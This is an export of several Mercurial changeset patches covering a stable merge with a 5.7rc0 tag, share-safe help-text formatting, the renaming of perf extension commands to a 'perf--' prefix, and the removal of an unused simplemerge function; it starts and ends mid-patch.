no @@ -1333,7 +1333,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no no @@ -1372,7 +1372,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no no @@ -1415,7 +1415,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: yes no no persistent-nodemap: no no no @@ -1458,7 +1458,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no no @@ -1501,7 +1501,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: yes yes no persistent-nodemap: no no no # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1611076925 18000 # Tue Jan 19 12:22:05 2021 -0500 # Node ID 3b1c0c36760657720ba782e365c18fd0f69712fc # Parent 4b0192f592cf1962576ef6b6bc688bd11ac2cbd6 # Parent 7e44d5ca2a2f976fb68413b872c6fa4f51cf429e merge with stable diff --git a/.hgsigs b/.hgsigs --- a/.hgsigs +++ b/.hgsigs @@ -205,3 +205,4 @@ 0e06a7ab9e0d5c65af4e511aee1e0342998799df 0 
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 diff --git a/.hgtags b/.hgtags --- a/.hgtags +++ b/.hgtags @@ -218,3 +218,4 @@ 0e06a7ab9e0d5c65af4e511aee1e0342998799df 5.6rc0 18c17d63fdabd009e70bf994e5efb7db422f4f7f 5.6 1d5189a57405ceca5aa244052c9f948977f4699b 5.6.1 +9da65e3cf3706ff41e08b311381c588440c27baf 5.7rc0 diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ 
b/mercurial/helptext/config.txt @@ -1948,12 +1948,16 @@ Possible values are `abort` (default), `allow`, `upgrade-abort` and `upgrade-abort`. - `abort`: Disallows running any command and aborts - `allow`: Respects the feature presence in the share source - `upgrade-abort`: tries to upgrade the share to use share-safe; - if it fails, aborts - `upgrade-allow`: tries to upgrade the share; if it fails, continue by - respecting the share source setting + + ``abort`` + Disallows running any command and aborts + ``allow`` + Respects the feature presence in the share source + ``upgrade-abort`` + tries to upgrade the share to use share-safe; if it fails, aborts + ``upgrade-allow`` + tries to upgrade the share; if it fails, continue by + respecting the share source setting ``safe-mismatch.source-not-safe`` @@ -1962,13 +1966,16 @@ Possible values are `abort` (default), `allow`, `downgrade-abort` and `downgrade-abort`. - `abort`: Disallows running any command and aborts - `allow`: Respects the feature presence in the share source - `downgrade-abort`: tries to downgrade the share to not use share-safe; - if it fails, aborts - `downgrade-allow`: tries to downgrade the share to not use share-safe; - if it fails, continue by respecting the shared - source setting + + ``abort`` + Disallows running any command and aborts + ``allow`` + Respects the feature presence in the share source + ``downgrade-abort`` + tries to downgrade the share to not use share-safe; if it fails, aborts + ``downgrade-allow`` + tries to downgrade the share to not use share-safe; + if it fails, continue by respecting the shared source setting ``safe-mismatch.source-safe.warn`` # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1607073061 -3600 # Fri Dec 04 10:11:01 2020 +0100 # Node ID b8d8fd2fe75f37bf1de4e4d8bfdbd901fc5ae175 # Parent 3b1c0c36760657720ba782e365c18fd0f69712fc perf: use the `perf--` prefix for perf command This is the one command namespace where they should not 
be any ambiguity about command that should be in it. The perf extensions is only adding performance related command. so this is a good ground to start putting dash folding to the tests. Differential Revision: https://phab.mercurial-scm.org/D9516 diff --git a/contrib/perf.py b/contrib/perf.py --- a/contrib/perf.py +++ b/contrib/perf.py @@ -744,7 +744,7 @@ # perf commands -@command(b'perfwalk', formatteropts) +@command(b'perf--walk', formatteropts) def perfwalk(ui, repo, *pats, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -759,7 +759,7 @@ fm.end() -@command(b'perfannotate', formatteropts) +@command(b'perf--annotate', formatteropts) def perfannotate(ui, repo, f, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -769,7 +769,7 @@ @command( - b'perfstatus', + b'perf--status', [ (b'u', b'unknown', False, b'ask status to look for unknown files'), (b'', b'dirstate', False, b'benchmark the internal dirstate call'), @@ -806,7 +806,7 @@ fm.end() -@command(b'perfaddremove', formatteropts) +@command(b'perf--addremove', formatteropts) def perfaddremove(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -837,7 +837,7 @@ cl._nodepos = None -@command(b'perfheads', formatteropts) +@command(b'perf--heads', formatteropts) def perfheads(ui, repo, **opts): """benchmark the computation of a changelog heads""" opts = _byteskwargs(opts) @@ -855,7 +855,7 @@ @command( - b'perftags', + b'perf--tags', formatteropts + [ (b'', b'clear-revlogs', False, b'refresh changelog and manifest'), @@ -880,7 +880,7 @@ fm.end() -@command(b'perfancestors', formatteropts) +@command(b'perf--ancestors', formatteropts) def perfancestors(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -894,7 +894,7 @@ fm.end() -@command(b'perfancestorset', formatteropts) +@command(b'perf--ancestorset', formatteropts) def perfancestorset(ui, repo, revset, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -910,7 
+910,7 @@ fm.end() -@command(b'perfdiscovery', formatteropts, b'PATH') +@command(b'perf--discovery', formatteropts, b'PATH') def perfdiscovery(ui, repo, path, **opts): """benchmark discovery between local repo and the peer at given path""" repos = [repo, None] @@ -928,7 +928,7 @@ @command( - b'perfbookmarks', + b'perf--bookmarks', formatteropts + [ (b'', b'clear-revlogs', False, b'refresh changelog and manifest'), @@ -953,7 +953,7 @@ fm.end() -@command(b'perfbundleread', formatteropts, b'BUNDLE') +@command(b'perf--bundleread', formatteropts, b'BUNDLE') def perfbundleread(ui, repo, bundlepath, **opts): """Benchmark reading of bundle files. @@ -1080,7 +1080,7 @@ @command( - b'perfchangegroupchangelog', + b'perf--changegroupchangelog', formatteropts + [ (b'', b'cgversion', b'02', b'changegroup version'), @@ -1116,7 +1116,7 @@ fm.end() -@command(b'perfdirs', formatteropts) +@command(b'perf--dirs', formatteropts) def perfdirs(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1132,7 +1132,7 @@ @command( - b'perfdirstate', + b'perf--dirstate', [ ( b'', @@ -1195,7 +1195,7 @@ fm.end() -@command(b'perfdirstatedirs', formatteropts) +@command(b'perf--dirstatedirs', formatteropts) def perfdirstatedirs(ui, repo, **opts): """benchmap a 'dirstate.hasdir' call from an empty `dirs` cache""" opts = _byteskwargs(opts) @@ -1212,7 +1212,7 @@ fm.end() -@command(b'perfdirstatefoldmap', formatteropts) +@command(b'perf--dirstatefoldmap', formatteropts) def perfdirstatefoldmap(ui, repo, **opts): """benchmap a `dirstate._map.filefoldmap.get()` request @@ -1233,7 +1233,7 @@ fm.end() -@command(b'perfdirfoldmap', formatteropts) +@command(b'perf--dirfoldmap', formatteropts) def perfdirfoldmap(ui, repo, **opts): """benchmap a `dirstate._map.dirfoldmap.get()` request @@ -1255,7 +1255,7 @@ fm.end() -@command(b'perfdirstatewrite', formatteropts) +@command(b'perf--dirstatewrite', formatteropts) def perfdirstatewrite(ui, repo, **opts): """benchmap the time it take to write 
a dirstate on disk""" opts = _byteskwargs(opts) @@ -1297,7 +1297,7 @@ @command( - b'perfmergecalculate', + b'perf--mergecalculate', [ (b'r', b'rev', b'.', b'rev to merge against'), (b'', b'from', b'', b'rev to merge from'), @@ -1330,7 +1330,7 @@ @command( - b'perfmergecopies', + b'perf--mergecopies', [ (b'r', b'rev', b'.', b'rev to merge against'), (b'', b'from', b'', b'rev to merge from'), @@ -1353,7 +1353,7 @@ fm.end() -@command(b'perfpathcopies', [], b"REV REV") +@command(b'perf--pathcopies', [], b"REV REV") def perfpathcopies(ui, repo, rev1, rev2, **opts): """benchmark the copy tracing logic""" opts = _byteskwargs(opts) @@ -1369,7 +1369,7 @@ @command( - b'perfphases', + b'perf--phases', [ (b'', b'full', False, b'include file reading time too'), ], @@ -1394,7 +1394,7 @@ fm.end() -@command(b'perfphasesremote', [], b"[DEST]") +@command(b'perf--phasesremote', [], b"[DEST]") def perfphasesremote(ui, repo, dest=None, **opts): """benchmark time needed to analyse phases of the remote server""" from mercurial.node import bin @@ -1455,7 +1455,7 @@ @command( - b'perfmanifest', + b'perf--manifest', [ (b'm', b'manifest-rev', False, b'Look up a manifest node revision'), (b'', b'clear-disk', False, b'clear on-disk caches too'), @@ -1499,7 +1499,7 @@ fm.end() -@command(b'perfchangeset', formatteropts) +@command(b'perf--changeset', formatteropts) def perfchangeset(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1513,7 +1513,7 @@ fm.end() -@command(b'perfignore', formatteropts) +@command(b'perf--ignore', formatteropts) def perfignore(ui, repo, **opts): """benchmark operation related to computing ignore""" opts = _byteskwargs(opts) @@ -1532,7 +1532,7 @@ @command( - b'perfindex', + b'perf--index', [ (b'', b'rev', [], b'revision to be looked up (default tip)'), (b'', b'no-lookup', None, b'do not revision lookup post creation'), @@ -1596,7 +1596,7 @@ @command( - b'perfnodemap', + b'perf--nodemap', [ (b'', b'rev', [], b'revision to be looked up 
(default tip)'), (b'', b'clear-caches', True, b'clear revlog cache between calls'), @@ -1667,7 +1667,7 @@ fm.end() -@command(b'perfstartup', formatteropts) +@command(b'perf--startup', formatteropts) def perfstartup(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1685,7 +1685,7 @@ fm.end() -@command(b'perfparents', formatteropts) +@command(b'perf--parents', formatteropts) def perfparents(ui, repo, **opts): """benchmark the time necessary to fetch one changeset's parents. @@ -1712,7 +1712,7 @@ fm.end() -@command(b'perfctxfiles', formatteropts) +@command(b'perf--ctxfiles', formatteropts) def perfctxfiles(ui, repo, x, **opts): opts = _byteskwargs(opts) x = int(x) @@ -1725,7 +1725,7 @@ fm.end() -@command(b'perfrawfiles', formatteropts) +@command(b'perf--rawfiles', formatteropts) def perfrawfiles(ui, repo, x, **opts): opts = _byteskwargs(opts) x = int(x) @@ -1739,7 +1739,7 @@ fm.end() -@command(b'perflookup', formatteropts) +@command(b'perf--lookup', formatteropts) def perflookup(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1748,7 +1748,7 @@ @command( - b'perflinelogedits', + b'perf--linelogedits', [ (b'n', b'edits', 10000, b'number of edits'), (b'', b'max-hunk-lines', 10, b'max lines in a hunk'), @@ -1786,7 +1786,7 @@ fm.end() -@command(b'perfrevrange', formatteropts) +@command(b'perf--revrange', formatteropts) def perfrevrange(ui, repo, *specs, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1795,7 +1795,7 @@ fm.end() -@command(b'perfnodelookup', formatteropts) +@command(b'perf--nodelookup', formatteropts) def perfnodelookup(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1814,7 +1814,7 @@ @command( - b'perflog', + b'perf--log', [(b'', b'rename', False, b'ask log to follow renames')] + formatteropts, ) def perflog(ui, repo, rev=None, **opts): @@ -1832,7 +1832,7 @@ fm.end() -@command(b'perfmoonwalk', formatteropts) 
+@command(b'perf--moonwalk', formatteropts) def perfmoonwalk(ui, repo, **opts): """benchmark walking the changelog backwards @@ -1851,7 +1851,7 @@ @command( - b'perftemplating', + b'perf--templating', [ (b'r', b'rev', [], b'revisions to run the template on'), ] @@ -1941,7 +1941,7 @@ @command( - b'perfhelper-mergecopies', + b'perf--helper-mergecopies', formatteropts + [ (b'r', b'revs', [], b'restrict search to these revisions'), @@ -2124,7 +2124,7 @@ @command( - b'perfhelper-pathcopies', + b'perf--helper-pathcopies', formatteropts + [ (b'r', b'revs', [], b'restrict search to these revisions'), @@ -2263,7 +2263,7 @@ _displaystats(ui, opts, entries, alldata) -@command(b'perfcca', formatteropts) +@command(b'perf--cca', formatteropts) def perfcca(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2271,7 +2271,7 @@ fm.end() -@command(b'perffncacheload', formatteropts) +@command(b'perf--fncacheload', formatteropts) def perffncacheload(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2284,7 +2284,7 @@ fm.end() -@command(b'perffncachewrite', formatteropts) +@command(b'perf--fncachewrite', formatteropts) def perffncachewrite(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2304,7 +2304,7 @@ fm.end() -@command(b'perffncacheencode', formatteropts) +@command(b'perf--fncacheencode', formatteropts) def perffncacheencode(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2348,7 +2348,7 @@ @command( - b'perfbdiff', + b'perf--bdiff', revlogopts + formatteropts + [ @@ -2464,7 +2464,7 @@ @command( - b'perfunidiff', + b'perf--unidiff', revlogopts + formatteropts + [ @@ -2543,7 +2543,7 @@ fm.end() -@command(b'perfdiffwd', formatteropts) +@command(b'perf--diffwd', formatteropts) def perfdiffwd(ui, repo, **opts): """Profile diff of working directory changes""" opts = _byteskwargs(opts) @@ -2568,7 +2568,7 @@ fm.end() -@command(b'perfrevlogindex', revlogopts + 
formatteropts, b'-c|-m|FILE') +@command(b'perf--revlogindex', revlogopts + formatteropts, b'-c|-m|FILE') def perfrevlogindex(ui, repo, file_=None, **opts): """Benchmark operations against a revlog index. @@ -2704,7 +2704,7 @@ @command( - b'perfrevlogrevisions', + b'perf--revlogrevisions', revlogopts + formatteropts + [ @@ -2754,7 +2754,7 @@ @command( - b'perfrevlogwrite', + b'perf--revlogwrite', revlogopts + formatteropts + [ @@ -3047,7 +3047,7 @@ @command( - b'perfrevlogchunks', + b'perf--revlogchunks', revlogopts + formatteropts + [ @@ -3176,7 +3176,7 @@ @command( - b'perfrevlogrevision', + b'perf--revlogrevision', revlogopts + formatteropts + [(b'', b'cache', False, b'use caches instead of clearing')], @@ -3319,7 +3319,7 @@ @command( - b'perfrevset', + b'perf--revset', [ (b'C', b'clear', False, b'clear volatile cache between each call.'), (b'', b'contexts', False, b'obtain changectx for each revision'), @@ -3352,7 +3352,7 @@ @command( - b'perfvolatilesets', + b'perf--volatilesets', [ (b'', b'clear-obsstore', False, b'drop obsstore between each call.'), ] @@ -3401,7 +3401,7 @@ @command( - b'perfbranchmap', + b'perf--branchmap', [ (b'f', b'full', False, b'Includes build time of subset'), ( @@ -3492,7 +3492,7 @@ @command( - b'perfbranchmapupdate', + b'perf--branchmapupdate', [ (b'', b'base', [], b'subset of revision to start from'), (b'', b'target', [], b'subset of revision to end with'), @@ -3602,7 +3602,7 @@ @command( - b'perfbranchmapload', + b'perf--branchmapload', [ (b'f', b'filter', b'', b'Specify repoview filter'), (b'', b'list', False, b'List brachmap filter caches'), @@ -3661,7 +3661,7 @@ fm.end() -@command(b'perfloadmarkers') +@command(b'perf--loadmarkers') def perfloadmarkers(ui, repo): """benchmark the time to parse the on-disk markers for a repo @@ -3673,7 +3673,7 @@ @command( - b'perflrucachedict', + b'perf--lrucachedict', formatteropts + [ (b'', b'costlimit', 0, b'maximum total cost of items in cache'), @@ -3829,7 +3829,7 @@ @command( - b'perfwrite', 
+ b'perf--write', formatteropts + [ (b'', b'write-method', b'write', b'ui write method'), @@ -3892,7 +3892,7 @@ @command( - b'perfprogress', + b'perf--progress', formatteropts + [ (b'', b'topic', b'topic', b'topic for progress messages'), diff --git a/tests/test-contrib-perf.t b/tests/test-contrib-perf.t --- a/tests/test-contrib-perf.t +++ b/tests/test-contrib-perf.t @@ -78,109 +78,121 @@ list of commands: - perfaddremove + perf--addremove + (no help text available) + perf--ancestors (no help text available) - perfancestors + perf--ancestorset (no help text available) - perfancestorset + perf--annotate (no help text available) - perfannotate (no help text available) - perfbdiff benchmark a bdiff between revisions - perfbookmarks + perf--bdiff benchmark a bdiff between revisions + perf--bookmarks benchmark parsing bookmarks from disk to memory - perfbranchmap + perf--branchmap benchmark the update of a branchmap - perfbranchmapload + perf--branchmapload benchmark reading the branchmap - perfbranchmapupdate + perf--branchmapupdate benchmark branchmap update from for <base> revs to <target> revs - perfbundleread + perf--bundleread Benchmark reading of bundle files. - perfcca (no help text available) - perfchangegroupchangelog + perf--cca (no help text available) + perf--changegroupchangelog Benchmark producing a changelog group for a changegroup. 
- perfchangeset + perf--changeset + (no help text available) + perf--ctxfiles (no help text available) - perfctxfiles (no help text available) - perfdiffwd Profile diff of working directory changes - perfdirfoldmap + perf--diffwd Profile diff of working directory changes + perf--dirfoldmap benchmap a 'dirstate._map.dirfoldmap.get()' request - perfdirs (no help text available) - perfdirstate benchmap the time of various distate operations - perfdirstatedirs + perf--dirs (no help text available) + perf--dirstate + benchmap the time of various distate operations + perf--dirstatedirs benchmap a 'dirstate.hasdir' call from an empty 'dirs' cache - perfdirstatefoldmap + perf--dirstatefoldmap benchmap a 'dirstate._map.filefoldmap.get()' request - perfdirstatewrite + perf--dirstatewrite benchmap the time it take to write a dirstate on disk - perfdiscovery + perf--discovery benchmark discovery between local repo and the peer at given path - perffncacheencode + perf--fncacheencode (no help text available) - perffncacheload + perf--fncacheload (no help text available) - perffncachewrite + perf--fncachewrite (no help text available) - perfheads benchmark the computation of a changelog heads - perfhelper-mergecopies + perf--heads benchmark the computation of a changelog heads + perf--helper-mergecopies find statistics about potential parameters for 'perfmergecopies' - perfhelper-pathcopies + perf--helper-pathcopies find statistic about potential parameters for the 'perftracecopies' - perfignore benchmark operation related to computing ignore - perfindex benchmark index creation time followed by a lookup - perflinelogedits + perf--ignore benchmark operation related to computing ignore + perf--index benchmark index creation time followed by a lookup + perf--linelogedits (no help text available) - perfloadmarkers + perf--loadmarkers benchmark the time to parse the on-disk markers for a repo - perflog (no help text available) - perflookup (no help text available) - perflrucachedict 
+ perf--log (no help text available) + perf--lookup (no help text available) + perf--lrucachedict (no help text available) - perfmanifest benchmark the time to read a manifest from disk and return a + perf--manifest + benchmark the time to read a manifest from disk and return a usable - perfmergecalculate + perf--mergecalculate (no help text available) - perfmergecopies + perf--mergecopies measure runtime of 'copies.mergecopies' - perfmoonwalk benchmark walking the changelog backwards - perfnodelookup + perf--moonwalk + benchmark walking the changelog backwards + perf--nodelookup (no help text available) - perfnodemap benchmark the time necessary to look up revision from a cold + perf--nodemap + benchmark the time necessary to look up revision from a cold nodemap - perfparents benchmark the time necessary to fetch one changeset's parents. - perfpathcopies + perf--parents + benchmark the time necessary to fetch one changeset's parents. + perf--pathcopies benchmark the copy tracing logic - perfphases benchmark phasesets computation - perfphasesremote + perf--phases benchmark phasesets computation + perf--phasesremote benchmark time needed to analyse phases of the remote server - perfprogress printing of progress bars - perfrawfiles (no help text available) - perfrevlogchunks + perf--progress + printing of progress bars + perf--rawfiles + (no help text available) + perf--revlogchunks Benchmark operations on revlog chunks. - perfrevlogindex + perf--revlogindex Benchmark operations against a revlog index. - perfrevlogrevision + perf--revlogrevision Benchmark obtaining a revlog revision. - perfrevlogrevisions + perf--revlogrevisions Benchmark reading a series of revisions from a revlog. - perfrevlogwrite + perf--revlogwrite Benchmark writing a series of revisions to a revlog. 
- perfrevrange (no help text available) - perfrevset benchmark the execution time of a revset - perfstartup (no help text available) - perfstatus benchmark the performance of a single status call - perftags (no help text available) - perftemplating + perf--revrange + (no help text available) + perf--revset benchmark the execution time of a revset + perf--startup + (no help text available) + perf--status benchmark the performance of a single status call + perf--tags (no help text available) + perf--templating test the rendering time of a given template - perfunidiff benchmark a unified diff between revisions - perfvolatilesets + perf--unidiff + benchmark a unified diff between revisions + perf--volatilesets benchmark the computation of various volatile set - perfwalk (no help text available) - perfwrite microbenchmark ui.write (and others) + perf--walk (no help text available) + perf--write microbenchmark ui.write (and others) (use 'hg help -v perf' to show built-in aliases and global options) $ hg perfaddremove # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611037929 28800 # Mon Jan 18 22:32:09 2021 -0800 # Node ID 98e3a693061ac49aaefc10ff449eb69a46886442 # Parent b8d8fd2fe75f37bf1de4e4d8bfdbd901fc5ae175 simplemerge: delete unused find_unconflicted() The function has been unused ever since it was introduced in 465b9ea02868 (Import 3-way merge code from bzr, 2007-04-16). Differential Revision: https://phab.mercurial-scm.org/D9832 diff --git a/mercurial/simplemerge.py b/mercurial/simplemerge.py --- a/mercurial/simplemerge.py +++ b/mercurial/simplemerge.py @@ -402,31 +402,6 @@ return sl - def find_unconflicted(self): - """Return a list of ranges in base that are not conflicted.""" - am = mdiff.get_matching_blocks(self.basetext, self.atext) - bm = mdiff.get_matching_blocks(self.basetext, self.btext) - - unc = [] - - while am and bm: - # there is an unconflicted block at i; how long does it - # extend? until whichever one ends earlier. 
- a1 = am[0][0] - a2 = a1 + am[0][2] - b1 = bm[0][0] - b2 = b1 + bm[0][2] - i = intersect((a1, a2), (b1, b2)) - if i: - unc.append(i) - - if a2 < b2: - del am[0] - else: - del bm[0] - - return unc - def _verifytext(text, path, ui, opts): """verifies that text is non-binary (unless opts[text] is passed, diff --git a/tests/test-simplemerge.py b/tests/test-simplemerge.py --- a/tests/test-simplemerge.py +++ b/tests/test-simplemerge.py @@ -141,8 +141,6 @@ """No conflicts because nothing changed""" m3 = Merge3([b'aaa', b'bbb'], [b'aaa', b'bbb'], [b'aaa', b'bbb']) - self.assertEqual(m3.find_unconflicted(), [(0, 2)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 2, 0, 2, 0, 2), (2, 2, 2, 2, 2, 2)], @@ -189,8 +187,6 @@ [b'aaa', b'bbb'], [b'aaa', b'111', b'bbb'], [b'aaa', b'bbb'] ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (1, 2)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (1, 2, 2, 3, 1, 2), (2, 2, 3, 3, 2, 2)], @@ -271,8 +267,6 @@ [b'aaa\n', b'222\n', b'bbb\n'], ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (1, 2)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (1, 2, 2, 3, 2, 3), (2, 2, 3, 3, 3, 3)], @@ -323,8 +317,6 @@ [b'aaa', b'222', b'bbb'], ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (2, 3)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (2, 3, 2, 3, 2, 3), (3, 3, 3, 3, 3, 3)], @@ -338,8 +330,6 @@ [b'aaa', b'222', b'222', b'222', b'222', b'bbb'], ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (3, 4)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (3, 4, 4, 5, 5, 6), (4, 4, 5, 5, 6, 6)], # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611093642 28800 # Tue Jan 19 14:00:42 2021 -0800 # Node ID 0c95b59a89f17aabb202e1f1502b311f6b854d3b # Parent 98e3a693061ac49aaefc10ff449eb69a46886442 resolve: also detect new :mergediff conflict markers The conflict markers created by `:mergediff` were not 
